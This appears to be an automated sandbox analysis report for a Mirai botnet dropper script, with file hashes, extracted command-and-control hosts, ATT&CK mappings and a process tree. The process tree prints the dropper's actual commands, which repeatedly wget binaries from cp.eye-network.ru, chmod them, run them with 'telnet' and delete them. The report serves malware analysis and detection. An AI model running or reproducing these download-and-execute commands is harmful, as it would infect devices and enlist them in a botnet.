mirai | 520ee4f7fba6358cfef4aa216cfe0294fd8b4c28b5b8c0fe6de83b3ca208249a

Analysis

max time kernel
10s
max time network
12s
platform
debian-9_mipsel
resource
debian9-mipsel-20240729-en
resource tags

arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
19-12-2024 22:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

809B
MD5

1e8348b42b38787c7c1660f00ece290d
SHA1

e031daa5ac284dcd2fd0f34f6918b6957efdd3c3
SHA256

520ee4f7fba6358cfef4aa216cfe0294fd8b4c28b5b8c0fe6de83b3ca208249a
SHA512

634e2e20f250cd47c0df75bcc6b23b150e81585f262f2229890337aab21d6fde56b0a264892ab9a34849e01ad118b8b544a86a5fa1688b23aa10b2d433274a2e

Score

10^/10

mirai botnet botnet defense_evasion

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

boats.dogmuncher.xyz

89.190.156.145

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
754	chmod
762	chmod
735	chmod
750	chmod
766	chmod
775	chmod
785	chmod
797	chmod
745	chmod
758	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/fnkea7	767	fnkea7

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/fnkea7	wget

/tmp/wget.sh
/tmp/wget.sh
1⤵
PID:714
- /usr/bin/wget
  wget http://cp.eye-network.ru/wkb86
  2⤵
  PID:718
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /tmp/wkb86
  ./wkb86 telnet
  2⤵
  PID:736
- /bin/rm
  rm -rf wkb86
  2⤵
  PID:737
- /usr/bin/wget
  wget http://cp.eye-network.ru/kqibeps
  2⤵
  PID:738
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:745
- /tmp/kqibeps
  ./kqibeps telnet
  2⤵
  PID:746
- /bin/rm
  rm -rf kqibeps
  2⤵
  PID:747
- /usr/bin/wget
  wget http://cp.eye-network.ru/bojwsl
  2⤵
  PID:748
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/bojwsl
  ./bojwsl telnet
  2⤵
  PID:751
- /bin/rm
  rm -rf bojwsl
  2⤵
  PID:752
- /usr/bin/wget
  wget http://cp.eye-network.ru/njvwa4
  2⤵
  PID:753
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:754
- /tmp/njvwa4
  ./njvwa4 telnet
  2⤵
  PID:755
- /bin/rm
  rm -rf njvwa4
  2⤵
  PID:756
- /usr/bin/wget
  wget http://cp.eye-network.ru/ngwa5
  2⤵
  PID:757
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/ngwa5
  ./ngwa5 telnet
  2⤵
  PID:759
- /bin/rm
  rm -rf ngwa5
  2⤵
  PID:760
- /usr/bin/wget
  wget http://cp.eye-network.ru/woega6
  2⤵
  PID:761
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:762
- /tmp/woega6
  ./woega6 telnet
  2⤵
  PID:763
- /bin/rm
  rm -rf woega6
  2⤵
  PID:764
- /usr/bin/wget
  wget http://cp.eye-network.ru/fnkea7
  2⤵
  - Writes file to tmp directory
  PID:765
- /bin/chmod
  chmod +x fnkea7 systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/fnkea7
  ./fnkea7 telnet
  2⤵
  - Executes dropped EXE
  PID:767
- /bin/rm
  rm -rf fnkea7
  2⤵
  PID:769
- /usr/bin/wget
  wget http://cp.eye-network.ru/gnjqwpc
  2⤵
  PID:770
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:775
- /tmp/gnjqwpc
  ./gnjqwpc telnet
  2⤵
  PID:776
- /bin/rm
  rm -rf gnjqwpc
  2⤵
  PID:777
- /usr/bin/wget
  wget http://cp.eye-network.ru/wlw68k
  2⤵
  PID:779
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/wlw68k
  ./wlw68k telnet
  2⤵
  PID:786
- /bin/rm
  rm -rf wlw68k
  2⤵
  PID:787
- /usr/bin/wget
  wget http://cp.eye-network.ru/wrjkngh4
  2⤵
  PID:789
- /bin/chmod
  chmod +x systemd-private-4f7bc37c86784b23b8185fb12343d192-systemd-timedated.service-aQOI5t wget.sh
  2⤵
  - File and Directory Permissions Modification
  PID:797
- /tmp/wrjkngh4
  ./wrjkngh4 telnet
  2⤵
  PID:798
- /bin/rm
  rm -rf wrjkngh4
  2⤵
  PID:799

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/fnkea7

Filesize
209KB

MD5
4528c59bd04bd8ec4cf3440685a609b9

SHA1
895498d902fec75311ab49b7743be541fb7c8bf4

SHA256
d8f8048861b5ea3320c47f44dbbc95037148ed46cba648ce6fdb3fd6f0dd0c4d

SHA512
89fb3ca4e65c5043544a5584807a1842d3e82e66a1363f650b5e6bd1cf7968a01a4a30d9c1a0120cfccad62fa51949e423af751c9f8a7d1ee8a7e1ec3a4ae571

Download Submit